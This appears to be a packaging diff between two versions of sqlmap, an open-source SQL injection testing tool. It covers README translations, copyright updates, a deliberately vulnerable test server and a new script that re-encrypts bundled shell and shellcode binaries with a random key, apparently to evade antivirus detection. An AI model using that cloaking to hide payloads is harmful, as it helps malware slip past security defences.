+++ sqlmap-1.5.11.5/doc/translations/README-vi-VN.md 2021-11-12 18:30:56.000000000 +0000 @@ -0,0 +1,52 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap là một công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tự động hóa quá trình phát hiện, khai thác lỗ hổng tiêm SQL và tiếp quản các máy chủ cơ sở dữ liệu. Nó đi kèm với +một hệ thống phát hiện mạnh mẽ, nhiều tính năng thích hợp cho người kiểm tra thâm nhập (pentester) và một loạt các tùy chọn bao gồm phát hiện cơ sở dữ liệu, truy xuất dữ liệu từ cơ sở dữ liệu, truy cập tệp của hệ thống và thực hiện các lệnh trên hệ điều hành từ xa. + +Ảnh chụp màn hình +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Bạn có thể truy cập vào [bộ sưu tập ảnh chụp màn hình](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), chúng trình bày một số tính năng có thể tìm thấy trong wiki. + +Cài đặt +---- + + +Bạn có thể tải xuống tập tin nén tar mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc tập tin nén zip mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Tốt hơn là bạn nên tải xuống sqlmap bằng cách clone với [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap hoạt động hiệu quả với [Python](https://www.python.org/download/) phiên bản **2.6**, **2.7** và **3.x** trên bất kì hệ điều hành nào. + +Sử dụng +---- + +Để có được danh sách các tùy chọn cơ bản, hãy sử dụng: + + python sqlmap.py -h + +Để có được danh sách tất cả các tùy chọn, hãy sử dụng: + + python sqlmap.py -hh + +Bạn có thể xem video chạy thử [tại đây](https://asciinema.org/a/46601). +Để có cái nhìn tổng quan về các khả năng của sqlmap, danh sách các tính năng được hỗ trợ và mô tả về tất cả các tùy chọn, cùng với các ví dụ, bạn nên tham khảo [hướng dẫn sử dụng](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (Tiếng Anh). + +Liên kết +---- + +* Trang chủ: https://sqlmap.org +* Tải xuống: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Nguồn cấp dữ liệu RSS về commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Theo dõi vấn đề: https://github.com/sqlmapproject/sqlmap/issues +* Hướng dẫn sử dụng: https://github.com/sqlmapproject/sqlmap/wiki +* Các câu hỏi thường gặp (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Ảnh chụp màn hình: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-zh-CN.md sqlmap-1.5.11.5/doc/translations/README-zh-CN.md --- sqlmap-1.4.4/doc/translations/README-zh-CN.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-zh-CN.md 2021-11-12 18:30:56.000000000 +0000 @@ -2,7 +2,7 @@ [![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) -sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 +sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过带外数据连接的方式执行操作系统命令。 演示截图 ---- @@ -20,7 +20,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6**, **2.7** 和 **3.x** 版本的任何平台上 +sqlmap 可以运行在 [Python](https://www.python.org/download/) **2.6**, **2.7** 和 **3.x** 版本的任何平台上 使用方法 ---- @@ -38,12 +38,12 @@ 链接 ---- -* 项目主页: http://sqlmap.org +* 项目主页: https://sqlmap.org * 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * 使用手册: https://github.com/sqlmapproject/sqlmap/wiki * 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* 教程: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/extra/beep/beep.py sqlmap-1.5.11.5/extra/beep/beep.py --- sqlmap-1.4.4/extra/beep/beep.py 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/beep/beep.py 2021-11-12 18:30:56.000000000 +0000 @@ -3,7 +3,7 @@ """ beep.py - Make a beep sound -Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff -Nru sqlmap-1.4.4/extra/beep/__init__.py sqlmap-1.5.11.5/extra/beep/__init__.py --- sqlmap-1.4.4/extra/beep/__init__.py 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/beep/__init__.py 2021-11-12 18:30:56.000000000 +0000 @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff -Nru sqlmap-1.4.4/extra/cloak/cloak.py sqlmap-1.5.11.5/extra/cloak/cloak.py --- sqlmap-1.4.4/extra/cloak/cloak.py 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/cloak/cloak.py 2021-11-12 18:30:56.000000000 +0000 @@ -3,7 +3,7 @@ """ cloak.py - Simple file encryption/compression utility -Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ @@ -19,28 +19,26 @@ if sys.version_info >= (3, 0): xrange = range + ord = lambda _: _ -def hideAscii(data): - retVal = b"" - for i in xrange(len(data)): - value = data[i] if isinstance(data[i], int) else ord(data[i]) - retVal += struct.pack('B', value ^ (127 if value < 128 else 0)) +KEY = b"ENWsCymUeJcXqSbD" - return retVal +def xor(message, key): + return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message))) def cloak(inputFile=None, data=None): if data is None: with open(inputFile, "rb") as f: data = f.read() - return hideAscii(zlib.compress(data)) + return xor(zlib.compress(data), KEY) def decloak(inputFile=None, data=None): if data is None: with open(inputFile, "rb") as f: data = f.read() try: - data = zlib.decompress(hideAscii(data)) + data = zlib.decompress(xor(data, KEY)) except Exception as ex: print(ex) print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile) @@ -52,7 +50,7 @@ def main(): usage = '%s [-d] -i [-o ]' % sys.argv[0] - parser = OptionParser(usage=usage, version='0.1') + parser = OptionParser(usage=usage, version='0.2') try: parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt') diff -Nru sqlmap-1.4.4/extra/cloak/__init__.py sqlmap-1.5.11.5/extra/cloak/__init__.py --- sqlmap-1.4.4/extra/cloak/__init__.py 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/cloak/__init__.py 2021-11-12 18:30:56.000000000 +0000 @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff -Nru sqlmap-1.4.4/extra/dbgtool/dbgtool.py sqlmap-1.5.11.5/extra/dbgtool/dbgtool.py --- sqlmap-1.4.4/extra/dbgtool/dbgtool.py 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/dbgtool/dbgtool.py 2021-11-12 18:30:56.000000000 +0000 @@ -3,7 +3,7 @@ """ dbgtool.py - Portable executable to ASCII debug script converter -Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff -Nru sqlmap-1.4.4/extra/dbgtool/__init__.py sqlmap-1.5.11.5/extra/dbgtool/__init__.py --- sqlmap-1.4.4/extra/dbgtool/__init__.py 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/dbgtool/__init__.py 2021-11-12 18:30:56.000000000 +0000 @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/extra/icmpsh/icmpsh.exe_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/extra/icmpsh/icmpsh.exe_ differ diff -Nru sqlmap-1.4.4/extra/__init__.py sqlmap-1.5.11.5/extra/__init__.py --- sqlmap-1.4.4/extra/__init__.py 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/__init__.py 2021-11-12 18:30:56.000000000 +0000 @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/extra/runcmd/runcmd.exe_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/extra/runcmd/runcmd.exe_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/extra/shellcodeexec/linux/shellcodeexec.x32_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/extra/shellcodeexec/linux/shellcodeexec.x32_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/extra/shellcodeexec/linux/shellcodeexec.x64_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/extra/shellcodeexec/linux/shellcodeexec.x64_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ differ diff -Nru sqlmap-1.4.4/extra/shutils/blanks.sh sqlmap-1.5.11.5/extra/shutils/blanks.sh --- sqlmap-1.4.4/extra/shutils/blanks.sh 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/shutils/blanks.sh 2021-11-12 18:30:56.000000000 +0000 @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission # Removes trailing spaces from blank lines inside project files diff -Nru sqlmap-1.4.4/extra/shutils/drei.sh sqlmap-1.5.11.5/extra/shutils/drei.sh --- sqlmap-1.4.4/extra/shutils/drei.sh 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/shutils/drei.sh 2021-11-12 18:30:56.000000000 +0000 @@ -1,13 +1,13 @@ #!/bin/bash -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission # Stress test against Python3 export SQLMAP_DREI=1 #for i in $(find . -iname "*.py" | grep -v __init__); do python3 -c 'import '`echo $i | cut -d '.' -f 2 | cut -d '/' -f 2- | sed 's/\//./g'`''; done -for i in $(find . -iname "*.py" | grep -v __init__); do PYTHONWARNINGS=all python3.7 -m compileall $i | sed 's/Compiling/Checking/g'; done +for i in $(find . -iname "*.py" | grep -v __init__); do PYTHONWARNINGS=all python3 -m compileall $i | sed 's/Compiling/Checking/g'; done unset SQLMAP_DREI source `dirname "$0"`"/junk.sh" diff -Nru sqlmap-1.4.4/extra/shutils/duplicates.py sqlmap-1.5.11.5/extra/shutils/duplicates.py --- sqlmap-1.4.4/extra/shutils/duplicates.py 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/shutils/duplicates.py 2021-11-12 18:30:56.000000000 +0000 @@ -1,6 +1,6 @@ #!/usr/bin/env python -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission # Removes duplicate entries in wordlist like files diff -Nru sqlmap-1.4.4/extra/shutils/junk.sh sqlmap-1.5.11.5/extra/shutils/junk.sh --- sqlmap-1.4.4/extra/shutils/junk.sh 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/shutils/junk.sh 2021-11-12 18:30:56.000000000 +0000 @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null diff -Nru sqlmap-1.4.4/extra/shutils/modernize.sh sqlmap-1.5.11.5/extra/shutils/modernize.sh --- sqlmap-1.4.4/extra/shutils/modernize.sh 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/shutils/modernize.sh 2021-11-12 18:30:56.000000000 +0000 @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission # sudo pip install modernize diff -Nru sqlmap-1.4.4/extra/shutils/pycodestyle.sh sqlmap-1.5.11.5/extra/shutils/pycodestyle.sh --- sqlmap-1.4.4/extra/shutils/pycodestyle.sh 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/shutils/pycodestyle.sh 2021-11-12 18:30:56.000000000 +0000 @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission # Runs pycodestyle on all python files (prerequisite: pip install pycodestyle) diff -Nru sqlmap-1.4.4/extra/shutils/pydiatra.sh sqlmap-1.5.11.5/extra/shutils/pydiatra.sh --- sqlmap-1.4.4/extra/shutils/pydiatra.sh 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/shutils/pydiatra.sh 2021-11-12 18:30:56.000000000 +0000 @@ -1,7 +1,7 @@ #!/bin/bash -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission -# Runs py2diatra on all python files (prerequisite: pip install pydiatra) -find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py2diatra '{}' \; | grep -v bare-except +# Runs py3diatra on all python files (prerequisite: pip install pydiatra) +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py3diatra '{}' \; | grep -v bare-except diff -Nru sqlmap-1.4.4/extra/shutils/pyflakes.sh sqlmap-1.5.11.5/extra/shutils/pyflakes.sh --- sqlmap-1.4.4/extra/shutils/pyflakes.sh 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/shutils/pyflakes.sh 2021-11-12 18:30:56.000000000 +0000 @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes) diff -Nru sqlmap-1.4.4/extra/shutils/pylint.sh sqlmap-1.5.11.5/extra/shutils/pylint.sh --- sqlmap-1.4.4/extra/shutils/pylint.sh 1970-01-01 00:00:00.000000000 +0000 +++ sqlmap-1.5.11.5/extra/shutils/pylint.sh 2021-11-12 18:30:56.000000000 +0000 @@ -0,0 +1,6 @@ +#!/bin/bash + +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pylint --rcfile=./.pylintrc '{}' \; diff -Nru sqlmap-1.4.4/extra/shutils/pypi.sh sqlmap-1.5.11.5/extra/shutils/pypi.sh --- sqlmap-1.4.4/extra/shutils/pypi.sh 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/shutils/pypi.sh 2021-11-12 18:30:56.000000000 +0000 @@ -16,7 +16,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ @@ -30,7 +30,7 @@ long_description_content_type='text/x-rst', author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar', author_email='bernardo@sqlmap.org, miroslav@sqlmap.org', - url='http://sqlmap.org', + url='https://sqlmap.org', project_urls={ 'Documentation': 'https://github.com/sqlmapproject/sqlmap/wiki', 'Source': 'https://github.com/sqlmapproject/sqlmap/', @@ -67,7 +67,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ @@ -149,7 +149,7 @@ Links ----- -- Homepage: http://sqlmap.org +- Homepage: https://sqlmap.org - Download: `.tar.gz `__ or `.zip `__ diff -Nru sqlmap-1.4.4/extra/shutils/recloak.sh sqlmap-1.5.11.5/extra/shutils/recloak.sh --- sqlmap-1.4.4/extra/shutils/recloak.sh 1970-01-01 00:00:00.000000000 +0000 +++ sqlmap-1.5.11.5/extra/shutils/recloak.sh 2021-11-12 18:30:56.000000000 +0000 @@ -0,0 +1,16 @@ +#!/bin/bash + +# NOTE: this script is for dev usage after AV something something + +DIR=$(cd -P -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd -P) + +cd $DIR/../.. +for file in $(find -regex ".*\.[a-z]*_" -type f | grep -v wordlist); do python extra/cloak/cloak.py -d -i $file; done + +cd $DIR/../cloak +sed -i 's/KEY = .*/KEY = b"'`python -c 'import random; import string; print("".join(random.sample(string.ascii_letters + string.digits, 16)))'`'"/g' cloak.py + +cd $DIR/../.. +for file in $(find -regex ".*\.[a-z]*_" -type f | grep -v wordlist); do python extra/cloak/cloak.py -i `echo $file | sed 's/_$//g'`; done + +git clean -f > /dev/null diff -Nru sqlmap-1.4.4/extra/vulnserver/__init__.py sqlmap-1.5.11.5/extra/vulnserver/__init__.py --- sqlmap-1.4.4/extra/vulnserver/__init__.py 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/vulnserver/__init__.py 2021-11-12 18:30:56.000000000 +0000 @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff -Nru sqlmap-1.4.4/extra/vulnserver/vulnserver.py sqlmap-1.5.11.5/extra/vulnserver/vulnserver.py --- sqlmap-1.4.4/extra/vulnserver/vulnserver.py 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/extra/vulnserver/vulnserver.py 2021-11-12 18:30:56.000000000 +0000 @@ -3,12 +3,13 @@ """ vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes) -Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ from __future__ import print_function +import base64 import json import re import sqlite3 @@ -18,6 +19,7 @@ PY3 = sys.version_info >= (3, 0) UNICODE_ENCODING = "utf-8" +DEBUG = False if PY3: from http.client import INTERNAL_SERVER_ERROR @@ -47,7 +49,7 @@ INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset'); INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny'); INSERT INTO users (id, name, surname) VALUES (3, 'wu', '179ad45c6ce2cb97cf1029e212046e81'); - INSERT INTO users (id, name, surname) VALUES (4, 'sqlmap/1.0-dev (http://sqlmap.org)', 'user agent header'); + INSERT INTO users (id, name, surname) VALUES (4, 'sqlmap/1.0-dev (https://sqlmap.org)', 'user agent header'); INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull'); """ @@ -58,6 +60,7 @@ _cursor = None _lock = None _server = None +_alive = False def init(quiet=False): global _conn @@ -83,7 +86,8 @@ try: HTTPServer.finish_request(self, *args, **kwargs) except Exception: - traceback.print_exc() + if DEBUG: + traceback.print_exc() class ReqHandler(BaseHTTPRequestHandler): def do_REQUEST(self): @@ -95,6 +99,7 @@ if "